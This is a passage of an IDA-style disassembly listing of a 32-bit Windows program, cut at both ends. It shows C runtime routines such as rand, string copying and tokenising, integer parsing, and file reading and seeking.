mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_429A80
; ---------------------------------------------------------------------------
loc_429A73: ; CODE XREF: sub_429A33+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_42DA95
pop ecx
pop ecx
loc_429A80: ; CODE XREF: sub_429A33+3E�j
mov eax, esi
pop esi
leave
retn
sub_429A33 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_429A90 proc near ; CODE XREF: sub_401990+8�p
; sub_402CBA+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_429AB0
loc_429A9C: ; CODE XREF: sub_429A90+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_429A9C
loc_429AB0: ; CODE XREF: sub_429A90+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_429A90 endp
; =============== S U B R O U T I N E =======================================
sub_429ABF proc near ; CODE XREF: sub_401A77+9�p
; sub_401AF0+9�p ...
arg_0 = dword ptr 4
call sub_42E41E
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_429ABF endp
; =============== S U B R O U T I N E =======================================
sub_429ACC proc near ; CODE XREF: sub_401A77+F�p
; sub_401A77+22�p ...
call sub_42E41E
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_429ACC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429AEE proc near ; CODE XREF: sub_401B6E+1F4�p
; sub_401B6E+284�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_42DBAD
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_429B2D
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_429B3A
; ---------------------------------------------------------------------------
loc_429B2D: ; CODE XREF: sub_429AEE+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_42DA95
pop ecx
pop ecx
loc_429B3A: ; CODE XREF: sub_429AEE+3D�j
mov eax, esi
pop esi
leave
retn
sub_429AEE endp
; =============== S U B R O U T I N E =======================================
sub_429B3F proc near ; CODE XREF: sub_401E8E+79�p
; sub_401E8E+89�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
cmp word ptr [eax], 0
jz short loc_429B53
loc_429B4B: ; CODE XREF: sub_429B3F+12�j
inc ecx
inc ecx
cmp word ptr [ecx], 0
jnz short loc_429B4B
loc_429B53: ; CODE XREF: sub_429B3F+A�j
mov edx, [esp+arg_4]
push esi
loc_429B58: ; CODE XREF: sub_429B3F+26�j
mov si, [edx]
mov [ecx], si
inc ecx
inc ecx
inc edx
inc edx
test si, si
jnz short loc_429B58
pop esi
retn
sub_429B3F endp
; =============== S U B R O U T I N E =======================================
sub_429B69 proc near ; CODE XREF: sub_40978A+373�p
; sub_40978A+3E3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push esi
mov dx, [ecx]
lea esi, [eax+2]
mov [eax], dx
loc_429B7B: ; CODE XREF: sub_429B69+21�j
inc ecx
inc ecx
test dx, dx
jz short loc_429B8C
mov dx, [ecx]
mov [esi], dx
inc esi
inc esi
jmp short loc_429B7B
; ---------------------------------------------------------------------------
loc_429B8C: ; CODE XREF: sub_429B69+17�j
pop esi
retn
sub_429B69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429B8E proc near ; CODE XREF: sub_401F44+3A�p
; sub_401F44+53�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
call sub_42E41E
push 8
mov [ebp+arg_4], eax
pop ecx
xor eax, eax
lea edi, [ebp+var_20]
push 7
rep stosd
pop edi
loc_429BAF: ; CODE XREF: sub_429B8E+3A�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_429BAF
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_429BD7
mov eax, [ebp+arg_4]
mov edx, [eax+18h]
loc_429BD7: ; CODE XREF: sub_429B8E+41�j
; sub_429B8E+67�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_429BF7
test al, al
jz short loc_429BF7
inc edx
jmp short loc_429BD7
; ---------------------------------------------------------------------------
loc_429BF7: ; CODE XREF: sub_429B8E+60�j
; sub_429B8E+64�j
mov ebx, edx
loc_429BF9: ; CODE XREF: sub_429B8E+89�j
mov al, [edx]
test al, al
jz short loc_429C1D
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_429C19
inc edx
jmp short loc_429BF9
; ---------------------------------------------------------------------------
loc_429C19: ; CODE XREF: sub_429B8E+86�j
and byte ptr [edx], 0
inc edx
loc_429C1D: ; CODE XREF: sub_429B8E+6F�j
mov eax, [ebp+arg_4]
pop edi
pop esi
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
and eax, ebx
pop ebx
leave
retn
sub_429B8E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_429C40 proc near ; CODE XREF: sub_401F44+2B�p
; sub_4020AA+92�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_429CC3
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_429C64
shr ecx, 2
jnz short loc_429CD1
jmp short loc_429C85
; ---------------------------------------------------------------------------
loc_429C64: ; CODE XREF: sub_429C40+1B�j
; sub_429C40+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_429C92
test al, al
jz short loc_429C9A
test esi, 3
jnz short loc_429C64
mov ebx, ecx
shr ecx, 2
jnz short loc_429CD1
loc_429C80: ; CODE XREF: sub_429C40+8F�j
and ebx, 3
jz short loc_429C92
loc_429C85: ; CODE XREF: sub_429C40+22�j
; sub_429C40+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_429CBE
dec ebx
jnz short loc_429C85
loc_429C92: ; CODE XREF: sub_429C40+2B�j
; sub_429C40+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_429C9A: ; CODE XREF: sub_429C40+2F�j
test edi, 3
jz short loc_429CB4
loc_429CA2: ; CODE XREF: sub_429C40+72�j
mov [edi], al
inc edi
dec ecx
jz loc_429D36
test edi, 3
jnz short loc_429CA2
loc_429CB4: ; CODE XREF: sub_429C40+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_429D27
loc_429CBB: ; CODE XREF: sub_429C40+7F�j
; sub_429C40+F4�j
mov [edi], al
inc edi
loc_429CBE: ; CODE XREF: sub_429C40+4D�j
dec ebx
jnz short loc_429CBB
pop ebx
pop esi
loc_429CC3: ; CODE XREF: sub_429C40+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_429CC9: ; CODE XREF: sub_429C40+A9�j
; sub_429C40+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_429C80
loc_429CD1: ; CODE XREF: sub_429C40+20�j
; sub_429C40+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_429CC9
test dl, dl
jz short loc_429D1B
test dh, dh
jz short loc_429D11
test edx, 0FF0000h
jz short loc_429D07
test edx, 0FF000000h
jnz short loc_429CC9
mov [edi], edx
jmp short loc_429D1F
; ---------------------------------------------------------------------------
loc_429D07: ; CODE XREF: sub_429C40+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_429D1F
; ---------------------------------------------------------------------------
loc_429D11: ; CODE XREF: sub_429C40+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_429D1F
; ---------------------------------------------------------------------------
loc_429D1B: ; CODE XREF: sub_429C40+AD�j
xor edx, edx
mov [edi], edx
loc_429D1F: ; CODE XREF: sub_429C40+C5�j
; sub_429C40+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_429D31
loc_429D27: ; CODE XREF: sub_429C40+79�j
xor eax, eax
loc_429D29: ; CODE XREF: sub_429C40+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_429D29
loc_429D31: ; CODE XREF: sub_429C40+E5�j
and ebx, 3
jnz short loc_429CBB
loc_429D36: ; CODE XREF: sub_429C40+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_429C40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429D3E proc near ; CODE XREF: sub_40221C+40�p
; sub_402CBA+27A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_4292D0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_42E525
add esp, 10h
leave
retn
sub_429D3E endp
; =============== S U B R O U T I N E =======================================
sub_429D72 proc near ; CODE XREF: sub_42C63D+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_429D89
add esp, 10h
retn
sub_429D72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429D89 proc near ; CODE XREF: sub_429D72+E�p
; sub_429F8E+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_429DA1: ; CODE XREF: sub_429D89+46�j
cmp dword_4535A4, 1
jle short loc_429DB9
movzx eax, bl
push 8
push eax
call sub_42F05B
pop ecx
pop ecx
jmp short loc_429DC8
; ---------------------------------------------------------------------------
loc_429DB9: ; CODE XREF: sub_429D89+1F�j
mov ecx, off_453398
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_429DC8: ; CODE XREF: sub_429D89+2E�j
test eax, eax
jz short loc_429DD1
mov bl, [esi]
inc esi
jmp short loc_429DA1
; ---------------------------------------------------------------------------
loc_429DD1: ; CODE XREF: sub_429D89+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_429DDF
or [ebp+arg_C], 2
jmp short loc_429DE4
; ---------------------------------------------------------------------------
loc_429DDF: ; CODE XREF: sub_429D89+4E�j
cmp bl, 2Bh
jnz short loc_429DEA
loc_429DE4: ; CODE XREF: sub_429D89+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_429DEA: ; CODE XREF: sub_429D89+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_429F7E
cmp eax, 1
jz loc_429F7E
cmp eax, 24h
jg loc_429F7E
push 10h
test eax, eax
pop ecx
jnz short loc_429E32
cmp bl, 30h
jz short loc_429E1C
mov [ebp+arg_8], 0Ah
jmp short loc_429E4E
; ---------------------------------------------------------------------------
loc_429E1C: ; CODE XREF: sub_429D89+88�j
mov al, [esi]
cmp al, 78h
jz short loc_429E2F
cmp al, 58h
jz short loc_429E2F
mov [ebp+arg_8], 8
jmp short loc_429E4E
; ---------------------------------------------------------------------------
loc_429E2F: ; CODE XREF: sub_429D89+97�j
; sub_429D89+9B�j
mov [ebp+arg_8], ecx
loc_429E32: ; CODE XREF: sub_429D89+83�j
cmp [ebp+arg_8], ecx
jnz short loc_429E4E
cmp bl, 30h
jnz short loc_429E4E
mov al, [esi]
cmp al, 78h
jz short loc_429E46
cmp al, 58h
jnz short loc_429E4E
loc_429E46: ; CODE XREF: sub_429D89+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_429E4E: ; CODE XREF: sub_429D89+91�j
; sub_429D89+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_429E5E: ; CODE XREF: sub_429D89+16C�j
cmp dword_4535A4, 1
movzx esi, bl
jle short loc_429E76
push 4
push esi
call sub_42F05B
pop ecx
pop ecx
jmp short loc_429E81
; ---------------------------------------------------------------------------
loc_429E76: ; CODE XREF: sub_429D89+DF�j
mov eax, off_453398
mov al, [eax+esi*2]
and eax, 4
loc_429E81: ; CODE XREF: sub_429D89+EB�j
test eax, eax
jz short loc_429E8D
movsx ecx, bl
sub ecx, 30h
jmp short loc_429EBF
; ---------------------------------------------------------------------------
loc_429E8D: ; CODE XREF: sub_429D89+FA�j
cmp dword_4535A4, 1
jle short loc_429EA1
push edi
push esi
call sub_42F05B
pop ecx
pop ecx
jmp short loc_429EAC
; ---------------------------------------------------------------------------
loc_429EA1: ; CODE XREF: sub_429D89+10B�j
mov eax, off_453398
mov ax, [eax+esi*2]
and eax, edi
loc_429EAC: ; CODE XREF: sub_429D89+116�j
test eax, eax
jz short loc_429EFA
movsx eax, bl
push eax
call sub_42C1A8
pop ecx
mov ecx, eax
sub ecx, 37h
loc_429EBF: ; CODE XREF: sub_429D89+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_429EFA
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_429EE4
jnz short loc_429EDE
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_429EE4
loc_429EDE: ; CODE XREF: sub_429D89+147�j
or [ebp+arg_C], 4
jmp short loc_429EED
; ---------------------------------------------------------------------------
loc_429EE4: ; CODE XREF: sub_429D89+145�j
; sub_429D89+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_429EED: ; CODE XREF: sub_429D89+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_429E5E
; ---------------------------------------------------------------------------
loc_429EFA: ; CODE XREF: sub_429D89+125�j
; sub_429D89+139�j
mov eax, [ebp+arg_C]
dec [ebp+var_4]
mov ebx, [ebp+arg_4]
test al, 8
jnz short loc_429F17
test ebx, ebx
jz short loc_429F11
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_429F11: ; CODE XREF: sub_429D89+180�j
and [ebp+var_8], 0
jmp short loc_429F62
; ---------------------------------------------------------------------------
loc_429F17: ; CODE XREF: sub_429D89+17C�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_429F3B
test al, 1
jnz short loc_429F62
and eax, 2
jz short loc_429F32
cmp [ebp+var_8], 80000000h
ja short loc_429F3B
loc_429F32: ; CODE XREF: sub_429D89+19E�j
test eax, eax
jnz short loc_429F62
cmp [ebp+var_8], esi
jbe short loc_429F62
loc_429F3B: ; CODE XREF: sub_429D89+195�j
; sub_429D89+1A7�j
call sub_42F049
test byte ptr [ebp+arg_C], 1
mov dword ptr [eax], 22h
jz short loc_429F52
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_429F62
; ---------------------------------------------------------------------------
loc_429F52: ; CODE XREF: sub_429D89+1C1�j
mov eax, [ebp+arg_C]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_8], eax
loc_429F62: ; CODE XREF: sub_429D89+18C�j
; sub_429D89+199�j ...
test ebx, ebx
jz short loc_429F6B
mov eax, [ebp+var_4]
mov [ebx], eax
loc_429F6B: ; CODE XREF: sub_429D89+1DB�j
test byte ptr [ebp+arg_C], 2
jz short loc_429F79
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_429F79: ; CODE XREF: sub_429D89+1E6�j
mov eax, [ebp+var_8]
jmp short loc_429F89
; ---------------------------------------------------------------------------
loc_429F7E: ; CODE XREF: sub_429D89+66�j
; sub_429D89+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_429F87
mov [eax], edi
loc_429F87: ; CODE XREF: sub_429D89+1FA�j
xor eax, eax
loc_429F89: ; CODE XREF: sub_429D89+1F3�j
pop edi
pop esi
pop ebx
leave
retn
sub_429D89 endp
; =============== S U B R O U T I N E =======================================
sub_429F8E proc near ; CODE XREF: sub_402CBA+37A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_429D89
add esp, 10h
retn
sub_429F8E endp
; =============== S U B R O U T I N E =======================================
sub_429FA5 proc near ; CODE XREF: sub_42A030+4�p
; sub_4338E9+1C1�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_429FAD: ; CODE XREF: sub_429FA5+34�j
cmp dword_4535A4, 1
jle short loc_429FC5
movzx eax, byte ptr [edi]
push 8
push eax
call sub_42F05B
pop ecx
pop ecx
jmp short loc_429FD4
; ---------------------------------------------------------------------------
loc_429FC5: ; CODE XREF: sub_429FA5+F�j
movzx eax, byte ptr [edi]
mov ecx, off_453398
mov al, [ecx+eax*2]
and eax, 8
loc_429FD4: ; CODE XREF: sub_429FA5+1E�j
test eax, eax
jz short loc_429FDB
inc edi
jmp short loc_429FAD
; ---------------------------------------------------------------------------
loc_429FDB: ; CODE XREF: sub_429FA5+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_429FEB
cmp esi, 2Bh
jnz short loc_429FEF
loc_429FEB: ; CODE XREF: sub_429FA5+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_429FEF: ; CODE XREF: sub_429FA5+44�j
xor ebx, ebx
loc_429FF1: ; CODE XREF: sub_429FA5+7B�j
cmp dword_4535A4, 1
jle short loc_42A006
push 4
push esi
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42A011
; ---------------------------------------------------------------------------
loc_42A006: ; CODE XREF: sub_429FA5+53�j
mov eax, off_453398
mov al, [eax+esi*2]
and eax, 4
loc_42A011: ; CODE XREF: sub_429FA5+5F�j
test eax, eax
jz short loc_42A022
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_429FF1
; ---------------------------------------------------------------------------
loc_42A022: ; CODE XREF: sub_429FA5+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_42A02B
neg eax
loc_42A02B: ; CODE XREF: sub_429FA5+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_429FA5 endp
; =============== S U B R O U T I N E =======================================
sub_42A030 proc near ; CODE XREF: sub_402CBA+336�p
; sub_402CBA+344�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_429FA5
pop ecx
retn
sub_42A030 endp
; =============== S U B R O U T I N E =======================================
sub_42A03B proc near ; CODE XREF: sub_4032A3+B0�p
; sub_40A938+4B46�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 40h
jz short loc_42A050
and dword ptr [esi+0Ch], 0
jmp short loc_42A067
; ---------------------------------------------------------------------------
loc_42A050: ; CODE XREF: sub_42A03B+D�j
push esi
call sub_42C104
push esi
call sub_42A06C
push esi
mov edi, eax
call sub_42C156
add esp, 0Ch
loc_42A067: ; CODE XREF: sub_42A03B+13�j
mov eax, edi
pop edi
pop esi
retn
sub_42A03B endp
; =============== S U B R O U T I N E =======================================
sub_42A06C proc near ; CODE XREF: sub_42A03B+1C�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 83h
jz short loc_42A0AF
push esi
call sub_42F209
push esi
mov edi, eax
call sub_42F1B0
push dword ptr [esi+10h]
call sub_42F0D0
add esp, 0Ch
test eax, eax
jge short loc_42A09D
or edi, 0FFFFFFFFh
jmp short loc_42A0AF
; ---------------------------------------------------------------------------
loc_42A09D: ; CODE XREF: sub_42A06C+2A�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_42A0AF
push eax
call sub_429822
and dword ptr [esi+1Ch], 0
pop ecx
loc_42A0AF: ; CODE XREF: sub_42A06C+D�j
; sub_42A06C+2F�j ...
and dword ptr [esi+0Ch], 0
mov eax, edi
pop edi
pop esi
retn
sub_42A06C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A0B8 proc near ; CODE XREF: sub_4032A3+83�p
; .text:0040A38A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push [ebp+arg_C]
call sub_42C104
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42A0E7
push [ebp+arg_C]
mov esi, eax
call sub_42C156
add esp, 18h
mov eax, esi
pop esi
pop ebp
retn
sub_42A0B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A0E7 proc near ; CODE XREF: sub_42A0B8+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_42A10B
xor eax, eax
jmp loc_42A1B4
; ---------------------------------------------------------------------------
loc_42A10B: ; CODE XREF: sub_42A0E7+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_42A11E
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_42A12A
; ---------------------------------------------------------------------------
loc_42A11E: ; CODE XREF: sub_42A0E7+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_42A12A
; ---------------------------------------------------------------------------
loc_42A127: ; CODE XREF: sub_42A0E7+C4�j
mov ecx, [ebp+arg_0]
loc_42A12A: ; CODE XREF: sub_42A0E7+35�j
; sub_42A0E7+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_42A15C
mov eax, [esi+4]
test eax, eax
jz short loc_42A15C
cmp ecx, eax
mov edi, ecx
jb short loc_42A141
mov edi, eax
loc_42A141: ; CODE XREF: sub_42A0E7+56�j
push edi
push dword ptr [esi]
push ebx
call sub_429350
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_42A1A7
; ---------------------------------------------------------------------------
loc_42A15C: ; CODE XREF: sub_42A0E7+49�j
; sub_42A0E7+50�j
cmp ecx, [ebp+arg_C]
jb short loc_42A18F
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_42A172
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_42A172: ; CODE XREF: sub_42A0E7+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_42F3EE
add esp, 0Ch
test eax, eax
jz short loc_42A1B9
cmp eax, 0FFFFFFFFh
jz short loc_42A1BF
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_42A1A7
; ---------------------------------------------------------------------------
loc_42A18F: ; CODE XREF: sub_42A0E7+78�j
push esi
call sub_42F312
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42A1C3
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_42A1A7: ; CODE XREF: sub_42A0E7+73�j
; sub_42A0E7+A6�j
cmp [ebp+arg_0], 0
jnz loc_42A127
mov eax, [ebp+arg_8]
loc_42A1B4: ; CODE XREF: sub_42A0E7+1F�j
; sub_42A0E7+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42A1B9: ; CODE XREF: sub_42A0E7+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_42A1C3
; ---------------------------------------------------------------------------
loc_42A1BF: ; CODE XREF: sub_42A0E7+9F�j
or dword ptr [esi+0Ch], 20h
loc_42A1C3: ; CODE XREF: sub_42A0E7+B2�j
; sub_42A0E7+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_42A1B4
sub_42A0E7 endp
; =============== S U B R O U T I N E =======================================
sub_42A1CF proc near ; CODE XREF: sub_4032A3+4D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_42C104
push esi
call sub_42A1F1
push esi
mov edi, eax
call sub_42C156
add esp, 0Ch
mov eax, edi
pop edi
pop esi
retn
sub_42A1CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A1F1 proc near ; CODE XREF: sub_42A1CF+D�p
; sub_42A37E+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_42A20D
mov [edi+4], ebx
loc_42A20D: ; CODE XREF: sub_42A1F1+17�j
push 1
push ebx
push esi
call sub_42F7E8
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_42A27F
mov ecx, [edi+0Ch]
test cx, 108h
jnz short loc_42A232
sub eax, [edi+4]
jmp loc_42A34D
; ---------------------------------------------------------------------------
loc_42A232: ; CODE XREF: sub_42A1F1+37�j
mov eax, [edi]
mov edx, [edi+8]
mov ebx, eax
sub ebx, edx
test cl, 3
mov [ebp+var_8], ebx
jz short loc_42A26F
mov ebx, esi
mov ecx, esi
sar ebx, 5
and ecx, 1Fh
mov ebx, dword_676EC0[ebx*4]
lea ecx, [ecx+ecx*8]
test byte ptr [ebx+ecx*4+4], 80h
jz short loc_42A287
mov ecx, edx
loc_42A260: ; CODE XREF: sub_42A1F1+7C�j
cmp ecx, eax
jnb short loc_42A287
cmp byte ptr [ecx], 0Ah
jnz short loc_42A26C
inc [ebp+var_8]
loc_42A26C: ; CODE XREF: sub_42A1F1+76�j
inc ecx
jmp short loc_42A260
; ---------------------------------------------------------------------------
loc_42A26F: ; CODE XREF: sub_42A1F1+50�j
test cl, 80h
jnz short loc_42A287
call sub_42F049
mov dword ptr [eax], 16h
loc_42A27F: ; CODE XREF: sub_42A1F1+2D�j
or eax, 0FFFFFFFFh
jmp loc_42A34D
; ---------------------------------------------------------------------------
loc_42A287: ; CODE XREF: sub_42A1F1+6B�j
; sub_42A1F1+71�j ...
cmp [ebp+var_4], 0
jnz short loc_42A295
mov eax, [ebp+var_8]
jmp loc_42A34D
; ---------------------------------------------------------------------------
loc_42A295: ; CODE XREF: sub_42A1F1+9A�j
test byte ptr [edi+0Ch], 1
jz loc_42A345
mov ecx, [edi+4]
test ecx, ecx
jnz short loc_42A2AE
and [ebp+var_8], ecx
jmp loc_42A345
; ---------------------------------------------------------------------------
loc_42A2AE: ; CODE XREF: sub_42A1F1+B3�j
sub eax, edx
add eax, ecx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
lea ebx, ds:676EC0h[eax*4]
mov eax, esi
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [esi+eax+4], 80h
jz short loc_42A33F
push 2
push 0
push [ebp+var_C]
call sub_42F7E8
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_42A306
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_42A2F1: ; CODE XREF: sub_42A1F1+10D�j
cmp eax, ecx
jnb short loc_42A300
cmp byte ptr [eax], 0Ah
jnz short loc_42A2FD
inc [ebp+arg_0]
loc_42A2FD: ; CODE XREF: sub_42A1F1+107�j
inc eax
jmp short loc_42A2F1
